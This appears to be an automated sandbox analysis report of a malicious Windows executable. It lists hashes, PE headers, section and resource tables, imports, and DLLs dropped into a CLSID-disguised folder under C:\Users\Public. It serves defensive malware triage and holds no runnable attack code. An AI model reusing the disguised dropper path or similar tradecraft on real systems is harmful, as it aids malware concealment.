                                  SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):105984
                                  Entropy (8bit):6.2884725801282775
                                  Encrypted:false
                                  SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
                                  MD5:91A0DD29773FBFB7112C5FCFF1873C13
                                  SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
                                  SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
                                  SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):115200
                                  Entropy (8bit):6.220212606349767
                                  Encrypted:false
                                  SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
                                  MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
                                  SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
                                  SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
                                  SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):115712
                                  Entropy (8bit):6.277217301921545
                                  Encrypted:false
                                  SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
                                  MD5:D0F0423AEEE6B6FF6754D860603D46D0
                                  SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
                                  SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
                                  SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):104448
                                  Entropy (8bit):6.259370376612282
                                  Encrypted:false
                                  SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
                                  MD5:7A8E8A0842D8D65713DEE5393E806755
                                  SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
                                  SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
                                  SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.416763990942278
                                  Encrypted:false
                                  SSDEEP:6144:Ocifpi6ceLPL9skLmb0m9SWSPtaJG8nAgex285i2MMhA20X4WABlGuNq5+:bi589SWIZBk2MM6AFBIo
                                  MD5:4EFF99FE879DB6535AD7E78FCB686775
                                  SHA1:BF11988083F31D66BDE964F4D129D926A9A79F84
                                  SHA-256:CC510FFBF60976662EAFE6BB4BE7A1C4E399D0E1355FF58A36EDC6F0B143BD47
                                  SHA-512:C891299EEFE312EFA6F3D241E5D5B06984D44182D2117B4DE52F1D5FAC1C357F42A435AB0CAAB0AE9C14D7F10F94B53ECED615E7FB579CE893887C1FDA14DB71
                                  Malicious:false
                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ."<.................................................................................................................................................................................................................................................................................................................................................W5.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Entropy (8bit):6.081762342853164
                                  TrID:
                                  • Win64 Executable GUI (202006/5) 92.64%
                                  • Win64 Executable (generic) (12005/4) 5.51%
                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                  • DOS Executable Generic (2002/1) 0.92%
                                  • VXD Driver (31/22) 0.01%
                                  File name:file.exe
                                  File size:11'950'592 bytes
                                  MD5:07fc5b4f3a432b09b0d51f8b00ef05f3
                                  SHA1:b098b5f859f45314d5edd03aad9eab420bbdec40
                                  SHA256:d65629e6028c54eb383b310547426ed1907296a14a2e8977b9d469126de1f8a9
                                  SHA512:ba4c21a022ea2253f26400c7d247d1b886f29e7d2e8722d3c1545830695106168605a963e448651e7d2613545ad903f4dbd17e09e30ed2167d5e65755794c888
                                  SSDEEP:98304:CdwqvpPlIpF6+2UT0lursS0lU7heqdQI:qwqhPlIp12C0luoU7h
                                  TLSH:E8C65B7F76A18629C22EC23AC0A38F04E93370BD1733C6E793A45169DF599D45E3E624
                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                                  Icon Hash:1f6c6cececf16117
                                  Entrypoint:0xcb1f90
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:
                                  Time Stamp:0x66F308C3 [Tue Sep 24 18:45:23 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:2
                                  File Version Major:5
                                  File Version Minor:2
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:2
                                  Import Hash:266fe50b75556d32a77ba4347fd8a6b3
                                  Instruction
                                  push ebp
                                  dec eax
                                  sub esp, 20h
                                  dec eax
                                  mov ebp, esp
                                  nop
                                  dec eax
                                  lea ecx, dword ptr [FFFE9B08h]
                                  call 00007FEE805B8FE0h
                                  dec eax
                                  mov eax, dword ptr [000BB09Ch]
                                  dec eax
                                  mov ecx, dword ptr [eax]
                                  call 00007FEE80877031h
                                  dec eax
                                  mov eax, dword ptr [000BB08Dh]
                                  dec eax
                                  mov ecx, dword ptr [eax]
                                  mov dl, 01h
                                  call 00007FEE80879CE0h
                                  dec eax
                                  mov eax, dword ptr [000BB07Ch]
                                  dec eax
                                  mov ecx, dword ptr [eax]
                                  dec eax
                                  mov edx, dword ptr [FFFE939Ah]
                                  dec esp
                                  mov eax, dword ptr [000BB77Bh]
                                  call 00007FEE80877033h
                                  dec eax
                                  mov eax, dword ptr [000BB05Fh]
                                  dec eax
                                  mov ecx, dword ptr [eax]
                                  call 00007FEE80877244h
                                  call 00007FEE805B0A0Fh
                                  jmp 00007FEE80E52E6Ah
                                  nop
                                  nop
                                  call 00007FEE805B0C06h
                                  nop
                                  dec eax
                                  lea esp, dword ptr [ebp+20h]
                                  pop ebp
                                  ret
                                  dec eax
                                  nop
                                  dec eax
                                  lea eax, dword ptr [00000000h+eax]
                                  dec eax
                                  sub esp, 28h
                                  call 00007FEE805B019Ch
                                  dec eax
                                  add esp, 28h
                                  ret
                                  int3
                                  int3
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x99e0000x9d.edata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x98e0000x50c6.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa8d0000x100200.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0xa1c0000x70b30.pdata
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a10000x7a060.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x9a00000x28.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x98f5000x1320.idata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x9940000x914c.didata
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x8b10200x8b1200375a7695d7a014dcd497198eb48daff1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .data0x8b30000xbab680xbac008576115677fae01541a8758828a6f879False0.2308975485274431data4.9676295748628565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .bss0x96e0000x1f0cc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata0x98e0000x50c60x5200a8f85f9f35e1c8e857717f7fdcac1451False0.24471227134146342data4.360232251720157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .didata0x9940000x914c0x9200c9086741b6c150ce3727b78eeda72390False0.17133989726027396data3.975549279463611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .edata0x99e0000x9d0x200893e24d9392a63a4bd48cfc340b37cc7False0.26171875data1.9432984069935513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .tls0x99f0000x3700x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rdata0x9a00000x6d0x2003a09e226e89da21473e0f2289fb020eaFalse0.197265625data1.370336840113611IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x9a10000x7a0600x7a200fdb73105589a0ad9d40ae623e4b179e4False0.43909328620777893data6.432756868541645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  .pdata0xa1c0000x70b300x70c00ac0dd8c50313df6cc28cac3e8c6627d7False0.49761164426274945data6.507502255985033IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc0xa8d0000x1002000x100200cd873dd086182eed8b4534ff56eddd02False0.33761896046852125data6.472835483270941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_CURSOR0xa8e0a00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                  RT_CURSOR0xa8e1d40x134dataEnglishUnited States0.4642857142857143
                                  RT_CURSOR0xa8e3080x134dataEnglishUnited States0.4805194805194805
                                  RT_CURSOR0xa8e43c0x134dataEnglishUnited States0.38311688311688313
                                  RT_CURSOR0xa8e5700x134dataEnglishUnited States0.36038961038961037
                                  RT_CURSOR0xa8e6a40x134dataEnglishUnited States0.4090909090909091
                                  RT_CURSOR0xa8e7d80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                  RT_ICON0xa8e90c0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 26880.4147121535181237
                                  RT_ICON0xa8f7b40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.476985559566787
                                  RT_ICON0xa9005c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 3200.48554913294797686
                                  RT_ICON0xa905c40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5167012448132781
                                  RT_ICON0xa92b6c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.5719981238273921
                                  RT_ICON0xa93c140x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.7109929078014184
                                  RT_STRING0xa9407c0x4ecdata0.3595238095238095
                                  RT_STRING0xa945680x7d4data0.3373253493013972
                                  RT_STRING0xa94d3c0x6c8data0.3675115207373272
                                  RT_STRING0xa954040x6ecdata0.3741534988713318
                                  RT_STRING0xa95af00x69cdata0.324468085106383
                                  RT_STRING0xa9618c0x54cdata0.3414454277286136
                                  RT_STRING0xa966d80x888data0.2793040293040293
                                  RT_STRING0xa96f600x518data0.36809815950920244
                                  RT_STRING0xa974780xcb8data0.2976044226044226
                                  RT_STRING0xa981300x5acdata0.3856749311294766
                                  RT_STRING0xa986dc0x690data0.31785714285714284
                                  RT_STRING0xa98d6c0x764data0.2869978858350951
                                  RT_STRING0xa994d00x69cdata0.3321513002364066
                                  RT_STRING0xa99b6c0x4e4data0.3586261980830671
                                  RT_STRING0xa9a0500x528data0.33484848484848484
                                  RT_STRING0xa9a5780x5acdata0.3443526170798898
                                  RT_STRING0xa9ab240x390data0.44298245614035087
                                  RT_STRING0xa9aeb40x3d4data0.4153061224489796
                                  RT_STRING0xa9b2880x53cdata0.3082089552238806
                                  RT_STRING0xa9b7c40x3d0data0.3719262295081967
                                  RT_STRING0xa9bb940x2c0data0.4303977272727273
                                  RT_STRING0xa9be540x124data0.6061643835616438
                                  RT_STRING0xa9bf780x320data0.45125
                                  RT_STRING0xa9c2980x478data0.3758741258741259
                                  RT_STRING0xa9c7100x560data0.35319767441860467
                                  RT_STRING0xa9cc700x508data0.3517080745341615
                                  RT_STRING0xa9d1780x33cdata0.3321256038647343
                                  RT_STRING0xa9d4b40x408data0.40310077519379844
                                  RT_STRING0xa9d8bc0xd8data0.6666666666666666
                                  RT_STRING0xa9d9940xd0data0.6634615384615384
                                  RT_STRING0xa9da640x2f4data0.44576719576719576
                                  RT_STRING0xa9dd580x3e0data0.3780241935483871
                                  RT_STRING0xa9e1380x398data0.3793478260869565
                                  RT_STRING0xa9e4d00x52cdata0.31797583081570996
                                  RT_STRING0xa9e9fc0x210data0.32007575757575757
                                  RT_STRING0xa9ec0c0x460data0.40625
                                  RT_STRING0xa9f06c0x664data0.35146699266503667
                                  RT_STRING0xa9f6d00x4f4data0.35252365930599366
                                  RT_STRING0xa9fbc40x3a0data0.3728448275862069
                                  RT_STRING0xa9ff640x348data0.39166666666666666
                                  RT_STRING0xaa02ac0x3bcdata0.36506276150627615
                                  RT_STRING0xaa06680x410data0.3798076923076923
                                  RT_STRING0xaa0a780xe8data0.5474137931034483
                                  RT_STRING0xaa0b600xc4data0.6275510204081632
                                  RT_STRING0xaa0c240x268data0.48863636363636365
                                  RT_STRING0xaa0e8c0x434data0.3308550185873606
                                  RT_STRING0xaa12c00x360data0.38425925925925924
                                  RT_STRING0xaa16200x2ecdata0.37566844919786097
                                  RT_STRING0xaa190c0x31cdata0.34296482412060303
                                  RT_RCDATA0xaa1c280x627eJPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, datetime=2010:05:11 20:59:59], baseline, precision 8, 256x256, components 3EnglishUnited States0.9922265408106608
                                  RT_RCDATA0xaa7ea80x10data1.5
                                  RT_RCDATA0xaa7eb80x40969dataEnglishUnited States0.5729551356438974
                                  RT_RCDATA0xae88240x101cdata0.4604752667313288
                                  RT_RCDATA0xae98400x151Delphi compiled form 'TForm1'0.7210682492581603
                                  RT_RCDATA0xae99940x87bDelphi compiled form '\031TfrmFDGUIxFMXAsyncExecute\030frmFDGUIxFMXAsyncExecute\004Left\002'0.43574389682174114
                                  RT_RCDATA0xaea2100xcbcDelphi compiled form 'TfrmFDGUIxFMXOptsBase'0.6263803680981596
                                  RT_RCDATA0xaeaecc0x4c651dataEnglishUnited States0.17103795623703713
                                  RT_RCDATA0xb375200x5580ddataEnglishUnited States0.2652239585861499
                                  RT_GROUP_CURSOR0xb8cd300x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                  RT_GROUP_CURSOR0xb8cd440x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                  RT_GROUP_CURSOR0xb8cd580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                  RT_GROUP_CURSOR0xb8cd6c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                  RT_GROUP_CURSOR0xb8cd800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                  RT_GROUP_CURSOR0xb8cd940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                  RT_GROUP_CURSOR0xb8cda80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                  RT_GROUP_ICON0xb8cdbc0x5adata0.7
                                  RT_VERSION0xb8ce180x368dataEnglishUnited States0.44954128440366975
                                  DLLImport
                                  oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                  advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                  user32.dllCharNextW, LoadStringW
                                  kernel32.dllSleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FindResourceW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle
                                  kernel32.dllGetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary
                                  user32.dllWINNLSEnableIME, SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateLayeredWindow, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TrackMouseEvent, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxIndirectW, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextLengthW, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRgn, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AppendMenuW, AdjustWindowRectEx, ActivateKeyboardLayout
                                  gdi32.dllUnrealizeObject, TextOutW, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetRegionData, GetPixel, GetPaletteEntries, GetObjectA, GetObjectW, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetCharABCWidthsFloatW, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateFontW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
                                  version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                  kernel32.dlllstrlenW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, OutputDebugStringW, MultiByteToWideChar, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathW, GetSystemDirectoryW, GetStdHandle, GetLongPathNameW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, ExpandEnvironmentStringsW, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringA, CompareStringW, CloseHandle
